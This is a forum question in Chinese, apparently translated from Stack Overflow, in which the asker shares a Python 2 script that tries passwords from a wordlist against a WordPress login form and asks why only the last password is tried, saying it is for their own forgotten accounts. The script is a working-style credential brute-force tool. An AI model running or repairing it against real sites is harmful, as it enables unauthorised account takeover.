回答此问题可获得 20 贡献值,回答如果被采纳可获得 50 分。
<p>我的问题在于:</p>
<pre><code>try:
PassL = open(sys.argv[3], "r").readlines()
print "[+] Passwords:",len(PassL),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in PassL:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
try:
login_form_data = urllib.urlencode(login_form_seq)
opener = urllib2.build_opener()
except:
print'Unknown ERROR'
try:
OP = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
OP = ""
else:
'wrong?'
if re.search("WordPress requires Cookies",OP):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
#Change this response if different. (language)
if re.search("<strong>ERROR</strong>",OP):
print "[-] Login Failed :",word
else:
print "\n[!] Login Successfull:",'[#]The Information:',sys.argv[2],':',word
</code></pre>
<p>所以问题是,我提供<code>sys.argv[2]</code>并得到<code>txt</code>文件。例如:</p>
^{pr2}$
<p>然后在python脚本中,我尝试使用哇.txt. 问题是,我在<code>wow.txt</code>中输入了15个密码,<code>www.py</code>脚本读取最后一行!在</p>
<p>这个脚本的目的是因为我忘记了很多我的Wordpress帐户(大约6个帐户),实际上我正在考虑为每个帐户尝试25个密码。所以让我更容易——不要说“去手动尝试”,只要给我代码或正确的方法。在</p>